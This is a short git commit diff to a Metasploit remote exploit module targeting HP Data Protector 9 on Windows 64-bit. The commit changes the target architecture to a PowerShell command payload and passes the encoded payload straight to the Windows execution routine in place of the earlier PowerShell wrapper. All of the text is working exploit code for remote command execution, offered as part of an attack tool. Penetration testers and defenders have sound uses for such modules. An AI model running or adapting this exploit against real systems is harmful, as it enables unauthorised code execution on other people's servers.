Use ARCH_CMD on Windows target
parent
a0fc0cf87f
commit
39a09ad750
|
@ -59,7 +59,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[ 'Windows 64 bits / HP Data Protector 9',
|
[ 'Windows 64 bits / HP Data Protector 9',
|
||||||
{
|
{
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Arch' => ARCH_X86_64,
|
'Arch' => ARCH_CMD,
|
||||||
|
'Payload' => {
|
||||||
|
'Compat' => {
|
||||||
|
'PayloadType' => 'cmd',
|
||||||
|
'RequiredCmd' => 'powershell'
|
||||||
|
}
|
||||||
|
}
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
|
@ -114,11 +120,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
if target.name =~ /Windows/
|
if target.name =~ /Windows/
|
||||||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
|
#command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
|
||||||
print_status("#{peer} - Exploiting through Powershell...")
|
print_status("#{peer} - Executing payload...")
|
||||||
execute_windows(command, dir)
|
execute_windows(payload.encoded, dir)
|
||||||
else
|
else
|
||||||
print_status("#{peer} - Exploiting payload...")
|
print_status("#{peer} - Executing payload...")
|
||||||
execute_linux(payload.encoded, dir)
|
execute_linux(payload.encoded, dir)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue